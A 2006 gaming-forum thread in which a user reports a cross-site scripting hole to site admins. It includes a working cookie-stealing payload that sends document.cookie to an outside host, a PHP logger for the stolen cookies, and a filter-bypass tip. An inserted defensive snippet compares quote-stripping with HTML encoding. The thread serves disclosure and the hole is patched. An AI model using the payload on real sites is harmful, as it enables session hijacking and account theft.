Yarold
jeremy02
Gamer God
Joined: 27 Nov 2003 Posts: 300 Location: Giving up
Posted: Fri Jul 07, 2006 12:20 pm Yarold
Anyone have any idea where Yarold is, or when he'll be online next?
Can someone view the dynasties page in IE and tell me if anything happens?
_________________ Sites I use:
Aim address updated.
TheNewestJedder
Hardcore Gamer
Joined: 12 May 2006 Posts: 24
Posted: Fri Jul 07, 2006 7:26 pm
I noticed it the past two days. Every time I visit, I get a Windows message that comes up.
jeremy02
Gamer God
Joined: 27 Nov 2003 Posts: 300 Location: Giving up
Posted: Fri Jul 07, 2006 10:15 pm
What does it say?
Basically, I could be stealing every user's account on this site who uses IE and views the dynasties page.
_________________ Sites I use:
Aim address updated.
TheNewestJedder
Hardcore Gamer
Joined: 12 May 2006 Posts: 24
Posted: Sat Jul 08, 2006 12:10 am
The message right there.
jeremy02
Gamer God
Joined: 27 Nov 2003 Posts: 300 Location: Giving up
Posted: Sat Jul 08, 2006 12:19 am
Yup, that's your cookie data.
_________________ Sites I use:
Aim address updated.
TheNewestJedder
Hardcore Gamer
Joined: 12 May 2006 Posts: 24
Posted: Sat Jul 08, 2006 12:25 am
It needs to be fixed now.
TheNewestJedder
Hardcore Gamer
Joined: 12 May 2006 Posts: 24
Posted: Sat Jul 08, 2006 12:29 am
I tried telling our good friend Metalteo, but it seems he is doing nothing but ignoring me when I try to alert him to a problem.
Metalteo
Site Admin
Helped: 14 times Joined: 12 Oct 2003 Posts: 1391
Posted: Sat Jul 08, 2006 12:53 am
Maybe I don't care.
Go ahead, jeremy, make my day and do it.
Locked.
Yarold
Site Admin
Helped: 12 times Age: 38 Joined: 12 Oct 2003 Posts: 765
Posted: Tue Jul 11, 2006 8:03 pm
I was moving from Warsaw to my home.
As for the problem: it doesn't look urgent, but as with every bug, it's nice to have it fixed.
I'll be thankful if someone can report this to me.
Also, don't blame Metal for bugs in scripts (for which I'm the more suitable person).
Metalteo
Site Admin
Helped: 14 times Joined: 12 Oct 2003 Posts: 1391
Posted: Tue Jul 11, 2006 8:41 pm
I already did fix part of the problem. The annoying java pop-up is gone at least.
It's a minor glitch and harmless, but you're right, it's nice if it gets fixed, since some feel the need to play silly games with it.
I'll send you a PM in chat to report it.
jeremy02
Gamer God
Joined: 27 Nov 2003 Posts: 300 Location: Giving up
Posted: Wed Jul 12, 2006 2:22 am
Yarold wrote:
As for the problem: it doesn't look urgent
Not true. This is the same problem that before allowed me to access 100s of accounts.
You think it's safe because you now filter ' and ", but you are forgetting about String.fromCharCode.
_________________ Sites I use:
Aim address updated.
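Added example, not part of the thread or the site's scripts: it shows why stripping ' and " from input does not stop script injection, while HTML-encoding the value at output does. The function names and the sample value are constructed for illustration.

```javascript
// Added illustration. stripQuotes is a hypothetical stand-in for the
// quote filter described in the thread, not the site's actual code.

// Blacklist approach: remove ' and " from user-supplied text.
function stripQuotes(input) {
  return String(input).replace(/['"]/g, "");
}

// Output encoding: replace every HTML-significant character with an
// entity so the browser renders the value as text, never as markup.
const HTML_ENTITIES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};
function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Rough check used for the comparison: would a browser still see an
// opening script tag in this value?
function containsScriptTag(value) {
  return /<\s*script\b/i.test(value);
}

// Constructed sample input: the string argument is built from character
// codes, so the whole value contains no quote characters to filter.
const sample = "<script>alert(String.fromCharCode(88,83,83))</script>";

// Run both defences over the same value and report what reaches the page.
function compareDefences(value) {
  const filtered = stripQuotes(value);
  const encoded = escapeHtml(value);
  return {
    filtered,
    filteredStillExecutes: containsScriptTag(filtered),
    encoded,
    encodedStillExecutes: containsScriptTag(encoded),
  };
}

console.log(compareDefences(sample));
```

This encoding is correct for values placed in HTML element content; values written into attributes, URLs or script blocks need the encoding for that context.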
Yarold
Site Admin
Helped: 12 times Age: 38 Joined: 12 Oct 2003 Posts: 765
Posted: Wed Jul 12, 2006 1:30 pm
But you can only make a popup with your own data (I think?).
jeremy02
Gamer God
Joined: 27 Nov 2003 Posts: 300 Location: Giving up
Posted: Wed Jul 12, 2006 11:21 pm
Yarold, that is why I would make the code like this.
Code:
javascript:window.location="http://www.site.com/cookie.php?c="+document.cookie
What that does is set the value "c" to the cookie from the site it's redirecting from.
Now, you make cookie.php look like this.
Code:
$cookie = $_GET['c'];
$fp = fopen("log.htm", 'w');
fwrite($fp, $cookie . "<br>");
fclose($fp);
So now that you wrote the user's cookie to log.htm, you can look at it and replace your own cookie data with theirs, meaning that you will then be logged in as that user.
_________________ Sites I use:
Aim address updated.
Yarold
Site Admin
Helped: 12 times Age: 38 Joined: 12 Oct 2003 Posts: 765
Posted: Wed Jul 12, 2006 11:40 pm
Hopefully fixed this one
(from version 0.72, cookie data from other people is not very useful)
jeremy02
Gamer God
Joined: 27 Nov 2003 Posts: 300 Location: Giving up
Posted: Thu Jul 13, 2006 12:01 am
Well I'd check for you to see if it's still exploitable, but of course Metalteo deleted my dynasty.
EDIT:
The only time cookie data isn't useful is when you validate the session somehow.
_________________ Sites I use:
Aim address updated.